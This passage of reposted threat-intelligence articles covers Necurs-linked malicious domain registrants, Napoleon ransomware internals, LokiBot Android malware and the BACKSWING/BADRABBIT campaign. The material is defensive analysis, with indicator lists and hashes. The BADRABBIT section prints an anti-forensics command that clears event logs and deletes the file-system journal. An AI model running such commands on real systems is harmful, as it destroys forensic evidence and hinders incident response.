Passive DNS also reveals instances where the attackers have hosted domains belonging to different registrants on the same IP address. For example, when Talos analyzed the passive DNS records for one of the attacker’s domains: ‘setinfoconf.com’ we found that this domain was hosted on a single IP address for a couple months in late 2016 before being parked. When we reviewed the other domains living on that same IP address we saw a bit of a pattern, and most importantly, some of these domains were NOT in the list of domains owned by ‘whois-agent@gmx.com’.

WHOIS-PROTECT@HOTMAIL.COM

When we check the registration information for one of the above domains ‘setinofis.pw’, we find that there is a different registrant. This time the email address used to register the domain was ‘whois-protect@hotmail.com’. Just as with the ‘whois-agent@gmx.com’ address, this is an attempt to appear to a casual observer that the domain is protected by whois privacy protection when in reality this email account appears to be under the direct control of the attackers themselves.

Reviewing the list of 1103 domains (Domain Tools as of January 17, 2018) associated with the ‘whois-protect@hotmail.com’ email address we see much of the same illicit activity we saw before.

More phishing domains:

amex-psk.org
amexsafetykey.org
applerecoveryprogram.com
applerecoveryprogram.top
barcalys-offers-online.com
bt-europe.com
btconnect.biz
btconnect.info
bttconnect.com
dhl4.com
docusign-australia.com
docusign-net.com
docusigner.org
dropbox-eu.com
dropboxa.com
dropboxes.org
dropboxsharing.com
dropboxsmarter.com
e-intuit.com
efaxplus.com
global-intuit.com
hsbcbank.top
inc-r.com
ing-update.info
kbc-bank.info
paupal.info
paypa.info
poypa1.info
quickbooks-intuit-uk.com
quickbooks-support.biz
quickbooksonlineaccounting.com
sage-uk.org
sageim.com
sages.biz
sagetop.com
security-hsbc.site
servicebying.com
telestrasystems.com
vodafonestore.net
wellsfargocertificate-637-9270.com

More domains targeting cryptocoin-related resources:

blockchfain.info
blokochain.info
myethelrwallet.com
myetherwallet.top
myetherwlallet.com
myethlerwallet.com
rnyetherwlallet.com

Similar themed, fake Flash Player updates:

flash-foe-update.win
flash-ire-update.win
flash-new-update.info
flash-old-update.top
flash-ome-update.win
flash-one-eupdatee.top
flash-one-eupdatte.top
flash-one-update.top
flash-one-update.win
flash-onenew-update.info
flash-ooe-update.win
flash-ore-update.win
flash-oue-update.top
flash-owe-update.win
flash-oxe-update.win
flash-oye-update.win
flash-playernewupdate.info
flash-toe-update.win
flash-woe-update.win
flash-yoe-update.win
flashnew-update.info
flashplayernew-update.info

We even see targeting of government resources, just as we did with the other registrant account:

afp-gov-au.com
asic-au-gov.com
asic-gov-au.com
asic-government-au.com
asic-mail-gov-au.com
asic-message-gov-au.com
asic-notification-gov.com
ato-gov-au.net
augovn.com
austgov.com
australiangovernement.com
australiangovernments.com
federalgovernmentaustralia.com
gov-invoices.info
goviau.co

TZYYWZ@QQ.COM

Checking the registration on some of the domains associated with ‘whois-privacy@hotmail.com’, we can find some domains in which there are other registrants and the whois-privacy@ address is simply an Administrative and Technical Contact. This reveals an additional registrant email address employed by the attackers, ‘tzyywz@qq.com’.

According to Domain Tools (as of January 17, 2017), that qq.com email address is associated with over 2500 domains. Most of the domains belonging to this registrant email appeared to be domainer-style domains located at TLDs such as .bid and .top, but we also see a heavy dose of illegitimate looking domains in the set as well.

Some typical ‘Domainer’-ish domains:

aapk.bid
aapo.bid
aapq.bid
aapu.bid
aapv.bid
aapw.bid
aapx.bid
jbanj.top
jcqth.top
jhtaq.top
jhugs.top
jian0.top
jian1.top
jian2.top
jian3.top

Illegitimate Domains:

amex-notification.com
amexaccountvalidate.com
amexcardcustomerservice.com
amexcardmail.com
amexcardpersonalsafetykey.com
amexcardpsk.com
amexcardsafetykey.com
amexcardservice.com
amexcardservicevalidate.com
amexcardsupport.com
amexcardsupportservice.com
amexcardsupportteam.com
amexcardverification.com
amexcardverified.com
amexcardverifier.com
amexcloudcervice.com
amexcustomersupport.com
amexmailnotification.com
amexotpcardcustomerservice.com
amexotpcardsupport.com
amexotpgenerate.com
amexotpgeneratesetup.com
amexotpsetup.com
amexotpsetupcustomerservice.com
amexotpsetupservice.com
amexpersonalsafekey.com
amexpersonalsafetykey.com
amexpersonalsafetykeyregistration.com
amexpersonalsafetykeysupport.com
amexpskcustomerservice.com
amexpskkey.com
amexpsksupport.com
amexsafetykeycustomerservice.com
amexverifier.com
amexverifierservice.com
docusign-australia.com
docusign-net.com
dropboxbusinessaccount.com
mail-asic-government-au.com
postbank-kundennummer43.com
postbank-kundennummerfinnaz.com
salesforceproaccount.com
verifybyamericanexpress.com
verifybyamexcards.com
yandex-login.com
yandex-user578185.com
yandex-user912.com
yandex-user952.com

MORE DOMAIN REGISTRANT ACCOUNTS REVEALED

We can associate even more registrant email accounts with these same threat actors using similar techniques. While researching passive DNS for one of the domains we found previously, ‘blokochain.info’, we ran across something very interesting. That particular domain was hosted October 21, 2017 on the IP address 47.254.18.28 which belongs to Alibaba as part of their cloud hosting product. When we analyze all the other domains which have been hosted on that same IP we see many domains that belong to the registrant email addresses we already knew about, ‘whois-agent@gmx.com’ and ‘whois-privacy@hotmail.com’. However we also see several domains associated with different registrants.

SEOBOSS@SEZNAM.CZ

Looking at the list of domains found on this same Alibaba IP we find the domain ‘paltruise.gdn’. This domain is registered to the registrant email address, ‘seoboss@seznam.cz’. This registrant has registered 125 domains (Domain Tools as of January 17, 2018), many of which have been linked to malicious activities. According to these links, domains associated with this registrant email have been used as part of the Rig Exploit Kit infrastructure. The domain, ‘paltruise.gdn’, was hosted on the 47.90.202.68 Alibaba IP address on October 19, 2017 –only two days before the IP was used to host domains belonging to ‘whois-protect@hotmail.com’.

GALICOLE@MAIL.COM

The domain ‘indian-trk711.com’ belongs to the registrant email address ‘galicole@mail.com’. The ‘indian-trk711.com’ domain was hosted on the 47.254.18.28 IP on October 25th through October 30th, 2017 –also very close to the timeframe in which we saw the IP hosting the other malicious domains.

As of January 16, 2017, DomainTools attributes 918 domains to the registrant email address ‘galicole@mail.com’. Among some of the domains associated with this address we find gems such as:

1royalbankrbcdirect.top
amex-onlinesecurity.top
buydumps.top
buydumpsonline.top
carder-cvv-shop.top
carder-cvv.name
carding-cvv-shop.top
carding-shop-cvv.top
carding-shop-track2.top
cardingcvv.top
cardingshoponline.top
cvv-carder.name
cvv-online-market.com
cvv-shop-carder.name
cvv-valid.info
cvv2-online-store.top
cvvcarder.name
cvvdumppluspin.top
cvvshopcarder.top
dumps-shop-valid.top
dumps-valid-shop.top
dumpsonlinestore.top
dumpsshopvalid.top
netflic-validatesystem.info
netflix-information.info
netflix-supportvalidate.info
netflix-verifysupport.info
netflix-veriificationbilling.info
netflixveriify.info
shop-dumps-valid.top
shop-online-cvv2.info
shop-online-dump.top
shopcardingonline.top
shopcardingtrack2.top
shopcvv2online.biz
shopcvvcarding.top
shopdumpsvalid.top
shoptrack2carding.top
store-cvv-online.biz
storecarderverified.biz
storecvv2.name
track2-shop-verified.biz
track2cardingshop.top
track2verifiedshop.top
valid-dumps.top
valid-market-cvv.top
valid-shop-cvv.top
valid-shop-dumps.top
validdumpsshop.top
verified-carder-store.com
verifiedcarderstore.biz
verifieddumpsshop.top
verifiedstorecarder.biz
verifiedtrack2shop.info

XLBS@TVCHD.COM

The domain ‘daccat.at’ is registered to ‘xlbs@tvchd.com’. A Google search for this domain produces this linkat Hybrid Analysis and indicates that this particular domain was contacted as part of a piece of malware. At Virus Total, 50/68 antivirus engines detect this particular sample as malicious.

JIAMCHO1955@DNSNAME.INFO

Searching Google for this registrant email address yields multiple links to malware that reaches out to domains owned by ‘jiamcho1955@dnsname.info’. Virus Total corroborates this information showing 48 and 53 antivirus detections respectively.

ONE INSTANCE TO HOST THEM ALL

Reaching out through various contacts, Talos was able to confirm that, in fact, a single Alibaba cloud instance was controlling this same IP address for the entire time period from October 19, 2017 through October 30, 2017. Is this IP address some part of a criminal domain hosting service? Or is it that a single nefarious enterprise is behind all of these various registrant email accounts and their associated domains? Only the criminals involved in this enterprise can say for certain. Talos continues to monitor this situation with an eye towards further deciphering the business model deployed by these miscreants.

Conclusion

Now that Necurs is back from their regular holiday break they are attempting to fill our inboxes with junk mail and malware once again. On one hand, the size of the Necurs botnet, and its ability to send from different nodes in every campaign makes it difficult to defend against; Standard IP address blacklists are ineffective against such tactics. Fortunately for network defenders, the fact that Necurs does relatively little to curate their recipient database limits the damage they can do. There are only so many times the same recipients will fall for Necurs’ same, repetitive tricks. We can expect that Necurs will continue to try variations on some of their tried and true attacks, and so user education against these threats remains paramount.

Go to Source
Author: Talos Group

Napoleon: a new version of Blind ransomware

The ransomware previously known as Blind has been spotted recently with a .napoleon extension and some additional changes. In this post, we’ll analyze the sample for its structure, behavior, and distribution method.

Analyzed samples

31126f48c7e8700a5d60c5222c8fd0c7 – Blind ransomware (the first variant), with .blind extension

9eb7b2140b21ddeddcbf4cdc9671dca1 – Variant with .kill extension

235b4fa8b8525f0a09e0c815dfc617d3.napoleon (main focus of this analysis)

//special thanks to @demonslay335  for sharing the older samples

Distribution method

So far we are not 100 percent sure about the distribution method of this new variant. However, looking at the features of the malware and judging from information from the victims, we suspect that the attackers spread it manually by dropping and deploying on the hacked machines (probably via IIS). This method of distribution is not popular or efficient, however we’ve encountered similar cases in the past, such as DMALocker or LeChiffre ransomware. Also, few months ago, hacked IIS servers were used as a vector to plant Monero miners. The common feature of samples dropped in this way is that they are not protected by any cryptor (because it’s not necessary for this distribution method).

Behavioral analysis

After the ransomware is deployed, it encrypts files one-by-one, adding its extension in the format [email].napoleon.

Looking at the content of the encrypted test files, we can see that the same plaintext gave different ciphertext. This always indicates that different key or initialization vectors were used for each file. (After examining the code, it turned out that the difference was in the initialization vector).

Visualizing the encrypted content helps us guess the algorithm with which the files were encrypted. In this case, we see no visible patterns, so this leads us to suspect an algorithm with some method of chaining cipher blocks. (The most commonly used is AES in CBC mode, or eventually in CFB mode). Below, you can see the visualization made with the help of the file2png script: On the left is a BMP file before encryption. And on the right, after encryption by Napoleon:

At the end of each file, we found a unique 384-long block of alphanumeric characters. They represent 192 bytes written in hexadecimal. Most probably this block is the encrypted initialization vector for the particular file):

The ransom note is in HTA format and looks like this:

It also contains a hexadecimal block, which is probably the victim’s key, encrypted with the attackers’ public key.

The GUI of Napoleon looks simplified in comparison to the Blind ransomware. However, the building blocks are the same:

It is common among ransomware authors to prepare a tor-base website that allows automatic processing for payments and better organizes communication with the victim. In this case, the attackers decided to use just an email—probably because they planned for the campaign to be small.

Among the files created by the Napoleon ransomware, we will no longer find the cache file (netcache64.sys) that in the previous editions allowed to recover the key without paying the ransom.

Below is the cache file dropped by the Blind ransomware (the predecessor of Napoleon):

Inside the code

The malware is written in C++. It is not packed by any cryptor.

The execution starts in the function WinMain:

The flow is pretty simple. First, the ransomware checks the privileges with which it runs. If it has sufficient privileges, it deletes shadow copies. Then, it closes processes related to databases—Oracle and SQL Server—so that they will not block access to the database files it wants to encrypt. Next, it goes through the disks and encrypts found files. At the end, it pops up the dropped ransom note in HTA format.

Comparing the code of Napoleon with the code of Blind, we see that not just the extension of encrypted files has has changed, but also many functions inside have been refactored.

Below is a fragment of the view from BinDiff: Napoleon vs Blind:

What is attacked?

First, the ransomware enumerates all the logical drives in the system and adds them into a target list. It attacks both fixed and remote drives ( type 3 -> DRIVE_FIXED  and 4 -> DRIVE_REMOTE):

This ransomware does not have any list of attacked extensions. It attacks all the files it can reach. It skips only the files that already have the extension indicating they are encrypted by Napoleon:

The email used in the extension is hardcoded in the ransomware’s code.

Encryption implementation

Just like the previous version, the cryptographic functions of Napoleon are implemented with the help of the statically-linked library Crypto++ (source).

Referenced strings pointing to Crypto++:

Inside, we found a hardcoded blob—the RSA public key of the attackers:

After conversion to a standardized format, such as PEM, we were able to read its parameters using openssl, confirming that it is a valid 2048 bit–long RSA key:

Public-Key: (2048 bit)
Modulus:
 00:96:c7:3f:aa:71:b1:e4:2c:2a:f3:22:0b:c2:88:
 8c:87:63:b3:fa:31:97:9b:48:1b:64:2a:14:b9:85:
 0a:2e:30:b2:22:c2:ee:fe:ce:de:db:b9:b7:68:3f:
 12:a6:b3:e1:2b:db:ac:90:ea:3e:0a:07:25:3d:19:
 f2:98:b3:b2:e3:1b:22:e6:0d:ad:d5:97:6f:57:cd:
 77:6c:68:16:49:db:7d:c0:b8:03:e3:81:f5:62:ce:
 22:ae:d9:71:f4:ed:28:f0:29:0b:e3:3c:ea:2d:d8:
 13:fd:00:ff:da:4a:55:b8:70:c3:9f:ef:32:43:4b:
 3f:82:fe:26:31:03:99:fd:b0:1a:2d:7b:f8:b6:65:
 ab:d8:65:f3:c6:f3:e3:06:a9:58:5f:3e:35:0e:4c:
 f0:9e:94:49:66:2e:9c:6c:51:27:62:c1:39:02:cc:
 fb:32:4f:9a:92:f5:f9:99:96:5d:a7:65:5f:1c:fc:
 0a:1e:8b:45:53:06:89:9f:50:11:d6:06:84:a2:f2:
 5f:ab:e4:fb:cf:0d:09:64:d7:7c:99:f9:2a:b7:f5:
 c6:e4:c1:23:24:4e:2b:9f:0b:98:c3:94:93:4f:ca:
 c3:ff:ec:70:9d:df:78:37:56:0d:8b:c4:db:6d:b3:
 73:ac:0a:cb:ac:28:b2:d4:54:61:3e:3c:7e:67:97:
 f5:d9
Exponent: 17 (0x11)

This attacker’s public key is later used to encrypt the random key generated for the particular victim. The random key is the one used to encrypt files – after it is used and destroyed, it’s encrypted version is stored in the victim’s ID displayed in the ransom note. Only the attackers, having the private RSA key, are capable to recover it.

The random AES key (32 bit) is generated by the function provided by Crypto++ library:

It uses underneath the secure random generator: CryptGenRandom:

All the files are encrypted with the same key, however the initialization vector is different for each.

Encrypting single file:

Inside the function denoted as encrypt_file, the crypto is initialized with a new initialization vector:

The fragment of code responsible for setting the IV:

Setting initialization vector:

Encrypting file content:

The same buffer after encryption:

Conclusion

Napoleon ransomware will probably not become a widespread threat. The authors prepared it for small campaigns—lot of data, like email, are hardcoded. It does not come with any external configuration like Cerber that would allow for fast customization.

So far, it seems that the authors fixed the previous bug in Blind of dropping the cache file. That means the ransomware is not decryptable without having the original key. All we can recommend is prevention.

This ransomware family is detected by Malwarebytes as Ransom.Blind.

Appendix

Read about how to decrypt the previous Blind variant here.

The post Napoleon: a new version of Blind ransomware appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

LokiBot: If not stealing, then extorting

Remember the Hydra of ancient mythology? The many-headed serpent that grew two heads when one was chopped off? A similarly dangerous beast has appeared in the Android malware zoo.

 

LokiBot as a banking Trojan

How do ordinary banking Trojans behave? They present the user with a fake screen that simulates the mobile banking interface. Unsuspecting victims enter their login credentials, which the malware redirects to the attackers, giving them access to the accounts.

How does LokiBot behave? Roughly the same way, but it simulates not only a banking app screen, but also WhatsApp, Skype, and Outlook client interfaces, displaying notifications purporting to come from these applications.

This means that a person can receive a fake notification, supposedly from their bank, saying that funds have been transferred to their account, and seeing the good news. then log in to the mobile banking client for confirmation. LokiBot even makes the smartphone vibrate when it displays the notification about the alleged transfer, which helps hoodwink even clued-in users.

But LokiBot has other tricks in store: It can open a browser, navigate to specific pages, and even use an infected device to send spam, which is basically how it distributes itself. Having pinched money from your account, LokiBot keeps going, sending a malicious SMS to all contacts in the phone book to infect as many smartphones and tablets as possible, and even replying to incoming messages if necessary.

If an attempt is made to remove LokiBot, the malware reveals another facet: To steal funds from a bank account, it needs administrator rights; if you try to deny it permission, it mutates from a banking Trojan into ransomware.

 

LokiBot as ransomware. How to unlock infected smartphone

In this case, LokiBot locks the screen and displays a message accusing the victim of viewing child pornography and demanding ransom; it also encrypts data on the device. Examining LokiBot’s code, researchers discovered that it uses weak encryption and doesn’t work properly; the attack leaves unencrypted copies of all files on the device, only under different names, so restoring the files is relatively simple.

However, the device screen is still locked, and the malware creators ask for about $100 in Bitcoin to unlock it. But you don’t have to oblige: After rebooting the device in safe mode, you can strip the malware of administrator rights and delete it. To do so, you first need to determine which version of Android you have:

  • Select Settings.
  • Select the General tab.
  • Select About the device.
  • Find the line Android version — the numbers below it indicate your OS version

To enable safe mode on a device with Version 4.4 to 7.1, do the following:

  • Press and hold the power button until a menu appears with the option Power off or Disconnect power source.
  • Press and hold Power off or Disconnect power source.
  • In the Turn on safe mode menu that appears, click OK.
  • Wait for the phone to reboot.

Owners of devices with other versions of Android should look online for information about how to enable safe mode for their particular phone.

Unfortunately, not everyone knows about this method of killing the malware: LokiBot victims have already coughed up nearly $1.5 million. And with LokiBot available on the black market for a mere $2,000, it is likely that the criminals responsible have repaid their investment many times over.

 

How to protect against LokiBot

In effect, the measures that can be taken to protect against LokiBot are applicable to any mobile malware. Here’s how to protect yourself:

– Never click on suspicious links — that’s how LokiBot spreads.

– Download apps only via Google Play — but be cautious even in the official store.

– Install a reliable security solution on your smartphone and tablet. Kaspersky Internet Security for Android detects all variants of LokiBot. With the paid version, there’s no need to scan the smartphone after installing each new application.

Go to Source
Author: Alexandra Golovina

BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to
distribute BADRABBIT ransomware to unwitting users. FireEye appliances
detected the download attempts and blocked our user base from
infection. During our investigation into the activity, FireEye
identified a direct overlap between BADRABBIT redirect sites and sites
hosting a profiler we’ve been tracking as BACKSWING. We’ve identified
51 sites hosting BACKSWING and four confirmed to drop BADRABBIT.
Throughout 2017, we observed two versions of BACKSWING and saw a
significant increase in May with an apparent focus on compromising
Ukrainian website. The pattern of deployment raises the possibility of
a strategic sponsor with specific regional interests and suggest a
motivation other than financial gain. Given that many domains are
still compromised with BACKSWING, we anticipate that there is a risk
that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked
attempts to infect multiple clients with a drive-by download
masquerading as a Flash Update (install_flash_player.exe) that
delivered a wormable variant of ransomware. Users were redirected to
the infected site from multiple legitimate sites (e.g.
http://www.mediaport[.]ua/sites/default/files/page-main.js)
simultaneously, indicating a coordinated and widespread strategic web
compromise campaign.

FireEye network devices blocked infection attempts at over a dozen
victims primarily in Germany, Japan, and the U.S. until Oct. 24 at
15:00 UTC, when the infection attempts ceased and attacker
infrastructure – both 1dnscontrol[.]com and the legitimate websites
containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of
collateral targeting. It is common for threat actors to pair a
strategic web compromise with profiling malware to target systems with
specific application versions or victims. FireEye observed that
BACKSWING, a malicious JavaScript profiling framework, was deployed to
at least 54 legitimate sites starting as early as September 2016.  A
handful of these sites were later used to redirect to BADRABBIT
distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct version of BACKSWING
that contain the same functionality, but differ in their code styles.
We consider BACKSWING a generic container used to select attributes of
the current browsing session (User-Agent, HTTP Referrer, Cookies, and
the current domain). This information is then relayed to a “C2”
sometimes to referred to as a “receiver.” If the receiver is online,
the server returns a unique JSON blob to the caller which is then
parsed by the BACKSWING code (Figure 1).


Figure 1: BACKSWING Reply

BACKSWING anticipates the JSON blob to have two fields,
“InjectionType” (expected to be an integer) and “InjectionString”
(expected to be string containing HTML content). BACKSWING version 1
(Figure 2) explicitly handles the value of “InjectionType” into two
code paths:

  • If InjectionType == 1 (Redirect browser to URL)
  • If
    InjectionType != 1 (render HTML into the DOM)


Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but
generalizes the InjectionString to be handled strictly to render the
reply into the DOM.


Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016
    on websites belonging to a Czech Republic hospitality organization
    in addition to a government website in Montenegro. Turkish-tourism
    websites were also injected with this profiler.
  • BACKSWING
    v1 was commonly injected in cleartext to affected websites, but over
    time, actors began to obfuscate the code using the open-source
    Dean-Edwards Packer and injected it into legitimate JavaScript
    resources on affected websites. Figure 4 shows the injection
    content.
  • Beginning in May 2017, FireEye observed a number of
    Ukrainian websites compromised with BACKSWING v1, and in June 2017,
    began to see content returned from BACKSWING receivers.
  • In
    late June 2017, BACKSWING servers returned an HTML div element with
    two distinct identifiers. When decoded, BACKSWING v1 embedded two
    div elements within the DOM with values of
    07a06a96-3345-43f2-afe1-2a70d951f50a and
    9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was
    observed in these replies.


Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on
    Oct. 5, 2017 across multiple websites that previously hosted
    BACKSWING v1
  • BACKSWING v2 was predominantly injected into
    legitimate JavaScript resources hosted on affected websites;
    however, some instances were injected into the sites’ main
    pages
  • FireEye observed limited instances of websites hosting
    this version were also implicated in suspected BADRABBIT infection
    chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about
potential victims before deploying payloads (in this case, the
BADRABBIT “flash update” dropper). While FireEye has not directly
observed BACKSWING delivering BADRABBIT, BACKSWING was observed on
multiple websites that were seen referring FireEye customers to
1dnsccontrol[.]com, which hosted the BADRABBIT dropper.

Table 1 highlights the legitimate sites hosting BACKSWING that were
also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website BACKSWING Receiver BACKSWING Version Observed BADRABBIT Redirect
blog.fontanka[.]ru Not Available Not Available 1dnscontrol[.]com
www.aica.co[.]jp http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com
www.fontanka[.]ru http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com
www.mediaport[.]ua http://172.97.69[.]79/i/ v1 1dnscontrol[.]com
www.mediaport[.]ua http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com
www.smetkoplan[.]com http://172.97.69[.]79/i/ v1 1dnscontrol[.]com
www.smetkoplan[.]com http://38.84.134[.]15/Core/Engine/Index/default v1 1dnscontrol[.]com
www.smetkoplan[.]com http://185.149.120[.]3/scholargoogle/ v2 1dnscontrol[.]com

Table 1: Sites hosting BACKSWING profilers and
redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the
first times that we have observed the potential weaponization of
BACKSWING. FireEye is tracking a growing number of legitimate websites
that also host BACKSWING underscoring a considerable footprint the
actors could leverage in future attacks. Table 2 provides a list of
sites also compromised with BACKSWING

Compromised Website BACKSWING Receiver BACKSWING Version
akvadom.kiev[.]ua http://172.97.69[.]79/i/ v1
bahmut.com[.]ua http://dfkiueswbgfreiwfsd[.]tk/i/ v1
bitte.net[.]ua http://172.97.69[.]79/i/ v1
bon-vivasan.com[.]ua http://172.97.69[.]79/i/ v1
bonitka.com[.]ua http://172.97.69[.]79/i/ v1
camp.mrt.gov[.]me http://38.84.134[.]15/Core/Engine/Index/two v1
Evrosmazki[.]ua http://172.97.69[.]79/i/ v1
forum.andronova[.]net http://172.97.69[.]79/i/ v1
forum.andronova[.]net http://91.236.116[.]50/Core/Engine/Index/two v1
grandua[.]ua http://172.97.69[.]79/i/ v1
grupovo[.]bg http://185.149.120[.]3/scholargoogle/ v2
hr.pensionhotel[.]com http://38.84.134[.]15/Core/Engine/Index/default v1
i24.com[.]ua http://172.97.69[.]79/i/ v1
i24.com[.]ua http://185.149.120[.]3/scholargoogle/ v2
icase.lg[.]ua http://172.97.69[.]79/i/ v1
montenegro-today[.]com http://38.84.134[.]15/Core/Engine/Index/two v1
montenegro-today[.]ru http://172.97.69[.]79/i/ v1
most-dnepr[.]info http://172.97.69[.]79/i/ v1
most-dnepr[.]info http://185.149.120[.]3/scholargoogle/ v2
obereg-t[.]com http://172.97.69[.]79/i/ v1
sarktur[.]com http://104.244.159[.]23:8080/i v1
sarktur[.]com http://38.84.134[.]15/Core/Engine/Index/default v1
school12.cn[.]ua http://172.97.69[.]79/i/ v1
sinematurk[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
vgoru[.]org http://172.97.69[.]79/i/ v1
www.2000[.]ua http://172.97.69[.]79/i/ v1
www.444android[.]com http://172.97.69[.]79/i/ v1
www.444android[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
www.aica.co[.]jp http://38.84.134[.]15/Core/Engine/Index/default v1
www.alapli.bel[.]tr http://91.236.116[.]50/Core/Engine/Index/two v1
www.ambilet[.]ro http://185.149.120[.]3/scholargoogle/ v2
www.andronova[.]net http://91.236.116[.]50/Core/Engine/Index/two v1
www.chnu.edu[.]ua http://172.97.69[.]79/i/ v1
www.dermavieskin[.]com https://bodum-online[.]gq/Core/Engine/Index/three v1
www.evrosmazki[.]ua http://172.97.69[.]79/i/ v1
www.hercegnovi[.]me http://38.84.134[.]15/Core/Engine/Index/two v1
www.len[.]ru http://185.149.120[.]3/scholasgoogle/ v2
www.montenegro-today[.]com http://38.84.134[.]15/Core/Engine/Index/two v1
www.montenegro-today[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
www.otbrana[.]com http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]be http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]cz http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]de http://172.97.69[.]79/i/ v1
www.pensionhotel[.]de http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]dk http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]nl http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]pl http://38.84.134[.]15/Core/Engine/Index/default v1
www.pensionhotel[.]ro http://46.20.1[.]98/scholargoogle/ v1
www.pensionhotel[.]sk http://38.84.134[.]15/Core/Engine/Index/default v1
www.sinematurk[.]com http://91.236.116[.]50/Core/Engine/Index/two v1
www.t.ks[.]ua http://172.97.69[.]79/i/ v1
www.teknolojihaber[.]net http://91.236.116[.]50/Core/Engine/Index/two v1
www.uscc[.]ua http://172.97.69[.]79/i/ v1
www.vertizontal[.]ro http://91.236.116[.]50/Core/Engine/Index/three v1
www.visa3777[.]com http://172.97.69[.]79/i/ v1
www.www.pensionhotel[.]de http://38.84.134[.]15/Core/Engine/Index/default v1

Table 2: Additional sites hosting BACKSWING
profilers and associated receivers

The distribution of sites compromised with BACKSWING suggest a
motivation other than financial gain. FireEye observed this framework
on compromised Turkish sites and Montenegrin sites over the past year.
We observed a spike of BACKSWING instances on Ukrainian sites, with a
significant increase in May 2017. While some sites hosting BACKSWING
do not have a clear strategic link, the pattern of deployment raises
the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.


Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5:
C4F26ED277B51EF45FA180BE597D96E8) to the C:Windows directory and
executes it using rundll32.exe with the argument
C:Windowsinfpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component
responsible for dropping and executing the additional components shown
in the BADRABBIT Components section. An embedded RSA-2048 key
facilitates the encryption process, which uses an AES-128 key to
encrypt files. The extensions listed below are targeted for encryption:

.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip

The following directories are ignored during the encryption process:

  • Windows
  • Program Files
  • ProgramData
  • AppData

The malware writes its ransom message to the root of each affected
drive with the filename Readme.txt.

The inpub.dat is capable of performing lateral movement via WMI or
SMB. Harvested credentials provided by an embedded Mimikatz executable
facilitate the infection of other systems on the network. The malware
contains lists of common usernames, passwords, and named pipes that it
can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system,
file encryption is not performed. If the malware is executed with the
“-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver
(cscc.dat) to install the malicious bootloader. If one of three McAfee
antivirus processes is running on the system, dispci.exe is written to
the %ALLUSERSPROFILE% directory; otherwise, it is written to
C:Windows. The sample is executed on system start using a scheduled
task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32 or 64-bit DiskCryptor
driver named cscc.dat facilitates disk encryption. It is installed in
the :Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32 or 64-bit Mimikatz variant is written a temporary file (e.g.,
651D.tmp) in the C:Windows directory and executed by passing a named
pipe string (e.g., \.pipe{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as
an argument. Harvested credentials are passed back to infpub.dat via
the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

The infpub.dat contains a checksum algorithm like the one used in
EternalPetya. However, the initial checksum value differs slightly:
0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also
supports the same command line arguments as EternalPetya with the
addition of the “-f” argument, which bypasses the malware’s credential
theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists
on the system and will exit if found. The file in this case is
cscc.dat. infpub.dat contains a wmic.exe lateral movement capability,
but unlike EternalPetya, does not contain a PSEXEC binary used to
perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands
to perform anti-forensics:

wevtutil cl Setup & wevtutil cl
System & wevtutil cl Security & wevtutil cl Application
& fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections

